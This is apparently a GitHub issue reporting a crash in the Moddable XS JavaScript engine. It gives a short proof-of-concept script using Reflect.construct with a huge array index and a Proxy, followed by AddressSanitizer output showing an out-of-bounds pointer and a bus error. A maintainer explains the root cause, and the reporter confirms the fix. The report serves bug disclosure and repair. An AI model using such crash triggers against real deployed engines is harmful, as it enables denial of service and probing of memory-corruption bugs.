Moddable-OpenSource/moddable #807: BUS xsRun.c:774 in fxRunID

jessysaurusrex, 2022-01-24:
### Version: 
[eecb298fb1d9019854591515664e369ad9cf5b53](https://github.com/Moddable-OpenSource/moddable/tree/eecb298fb1d9019854591515664e369ad9cf5b53)

### poc.js
```js
function main() {
const v1 = [1024];
v1[2147483647] = 1024;
const v2 = /\w\SMj\S+/gi;
const v5 = new Proxy(Object,v2);
const v7 = Reflect.construct(v5,v1);
}
main();
```

### Invocation `xst poc.js`
```
STDERR: 
/Users/amulet/moddable/xs/sources/xsScript.c:203:16: runtime error: left shift of 1327365517 by 1 places cannot be represented in type 'txSize' (aka 'int')
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsScript.c:203:16 in 
/Users/amulet/moddable/xs/sources/xsRun.c:773:19: runtime error: pointer index expression with base 0x00010860aec0 overflowed to 0xfffffff10860aec0
SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior /Users/amulet/moddable/xs/sources/xsRun.c:773:19 in 
AddressSanitizer:DEADLYSIGNAL
=================================================================
==90857==ERROR: AddressSanitizer: BUS on unknown address (pc 0x0001013bf034 bp 0x0001013beee8 sp 0x00016ee8ce60 T0)
==90857==The signal is caused by a UNKNOWN memory access.
==90857==Hint: this fault was caused by a dereference of a high value address (see register values below).  Disassemble the provided pc to learn which register was used.
    #0 0x1013bf034 in fxRunID xsRun.c:774

==90857==Register values:
 x[0] = 0xfffffff10860aec8   x[1] = 0x0000000000000000   x[2] = 0x0000000000000000   x[3] = 0x000000010af00f40  
 x[4] = 0x6a6cb03abcebc041   x[5] = 0x0000000000000000   x[6] = 0x0000000000000000   x[7] = 0x0000000000000000  
 x[8] = 0x1ffffffe210c15d9   x[9] = 0x0000007000020000  x[10] = 0x000000016eeb21f8  x[11] = 0x0000000000000004  
x[12] = 0x0000000000000000  x[13] = 0x00000001023d3350  x[14] = 0x0000000000000000  x[15] = 0x0000000000000000  
x[16] = 0x00000003067585fc  x[17] = 0x00000001022e80b8  x[18] = 0x0000000000000000  x[19] = 0x0000000101c8c060  
x[20] = 0x000000010178ea58  x[21] = 0x0000000101f10070  x[22] = 0x0000000000000000  x[23] = 0x0000000000000000  
x[24] = 0x0000000000000000  x[25] = 0x0000000000000000  x[26] = 0x0000000000000000  x[27] = 0x0000000000000000  
x[28] = 0x0000000000000000     fp = 0x000000016eebc1b0     lr = 0x00000001013beee8     sp = 0x000000016ee8ce60  
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: BUS xsRun.c:774 in fxRunID
==90857==ABORTING

Status: 
pid 90857 SIGABRT (signal 6)
```

phoddie, 2022-01-26:
`Reflect.construct` is uses `fxOrdinaryConstruct` which calls `fxToInteger` instead of `fxToLength` to get the number of arguments to push on the stack. So it crashes instead of overflowing the stack. The implementation of `fxOrdinaryCall` does this correctly.

jessysaurusrex, 2022-02-02:
Verified fixed in `fb7b2c2`

closed 2022-02-02 by jessysaurusrex